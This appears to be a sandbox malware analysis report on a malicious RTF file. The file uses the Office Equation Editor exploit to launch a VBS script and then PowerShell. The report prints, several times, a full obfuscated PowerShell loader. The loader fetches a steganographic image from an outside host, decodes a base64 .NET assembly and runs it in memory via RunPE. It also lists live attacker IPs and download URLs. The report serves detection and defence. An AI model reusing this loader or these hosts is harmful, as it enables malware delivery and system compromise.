"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )", CommandLine|ba
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3200, TargetFilename: C:\Users\user\AppData\Local\Temp\vjz3rtmh.qm2.ps1
    Timestamp:07/03/24-11:08:43.238447
    SID:2049038
    Source Port:80
    Destination Port:49162
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 4YlwTsmpuZ.rtfAvira: detected
    Source: uploaddeimagens.com.brVirustotal: Detection: 5%Perma Link
    Source: https://uploaddeimagens.com.brVirustotal: Detection: 6%Perma Link
    Source: http://uploaddeimagens.com.brVirustotal: Detection: 5%Perma Link
    Source: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235Virustotal: Detection: 5%Perma Link
    Source: 4YlwTsmpuZ.rtfVirustotal: Detection: 52%Perma Link
    Source: 4YlwTsmpuZ.rtfReversingLabs: Detection: 50%

    Exploits

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 23.95.235.16 Port: 80Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.0
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Software Vulnerabilities

    barindex
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035105D5 LoadLibraryW,2_2_035105D5
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03510696 ShellExecuteW,ExitProcess,2_2_03510696
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03510668 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03510668
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03510681 ShellExecuteW,ExitProcess,2_2_03510681
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0351050A ExitProcess,2_2_0351050A
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035106BB ExitProcess,2_2_035106BB
    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Source: global trafficDNS query: name: uploaddeimagens.com.br
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
    Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
    Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
    Source: global trafficTCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
    Source: global trafficTCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
    Source: global trafficTCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
    Source: global trafficTCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162

    Networking

    barindex
    Source: TrafficSnort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 91.92.254.29:80 -> 192.168.2.22:49162
    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 91.92.254.29 80Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03510668 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03510668
    Source: global trafficHTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 23.95.235.16 23.95.235.16
    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
    Source: Joe Sandbox ViewASN Name: THEZONEBG THEZONEBG
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
    Source: global trafficHTTP traffic detected: GET /33011/greatideaforfollowers.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /Users_API/syscore/file_xgep41gp.dyp.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 91.92.254.29
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.0
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.29
    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.29
    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.29
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.16
    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.29
    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.29
    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.29
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03510668 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03510668
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F0D9C1B9-F0D5-4902-9161-FED34811C4AD}.tmpJump to behavior
    Source: global trafficHTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /33011/greatideaforfollowers.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /Users_API/syscore/file_xgep41gp.dyp.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 91.92.254.29
    Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
    Source: global trafficDNS traffic detected: DNS query: uploaddeimagens.com.br
    Source: EQNEDT32.EXE, 00000002.00000002.346070197.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.1
    Source: EQNEDT32.EXE, 00000002.00000002.346070197.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.16/33011/grJ
    Source: EQNEDT32.EXE, 00000002.00000002.346070197.000000000059F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.16/33011/greatideaforfollowers.gif
    Source: EQNEDT32.EXE, 00000002.00000002.346271165.0000000003510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.16/33011/greatideaforfollowers.gifj
    Source: EQNEDT32.EXE, 00000002.00000002.346070197.000000000059F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.16/33011/greatideaforfollowers.gifyyC:
    Source: wscript.exe, 00000005.00000002.359992594.0000000000677000.00000004.00000020.00020000.00000000.sdmp, greatideaforfollowers.vBS.2.dr, greatideaforfollowers[1].gz.2.drString found in binary or memory: http://91.92.254.29/Users_API/syscore/file_xgep41gp.dyp.txt
    Source: powershell.exe, 00000006.00000002.359414442.0000000004FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
    Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
    Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
    Source: powershell.exe, 00000006.00000002.359414442.0000000004FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
    Source: powershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
    Source: powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
    Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
    Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
    Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
    Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
    Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
    Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
    Source: powershell.exe, 00000006.00000002.358503012.0000000002481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000006.00000002.358503012.0000000002FAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uploaddeimagens.com.br
    Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
    Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
    Source: powershell.exe, 00000006.00000002.358503012.0000000002FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
    Source: powershell.exe, 00000006.00000002.358383867.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/
    Source: powershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.359414442.0000000004F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235
    Source: powershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235YKo;
    Source: powershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235p
    Source: powershell.exe, 00000006.00000002.358503012.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000003015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: powershell.exe, 00000006.00000002.358503012.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000003015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163

    System Summary

    barindex
    Source: 4YlwTsmpuZ.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
    Source: Process Memory Space: powershell.exe PID: 3200, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\ProgIDJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgIDJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: 4YlwTsmpuZ.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
    Source: Process Memory Space: powershell.exe PID: 3200, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: classification engineClassification label: mal100.expl.evad.winRTF@7/12@1/3
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$lwTsmpuZ.rtfJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR65F3.tmpJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS"
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: 4YlwTsmpuZ.rtfVirustotal: Detection: 52%
    Source: 4YlwTsmpuZ.rtfReversingLabs: Detection: 50%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS"
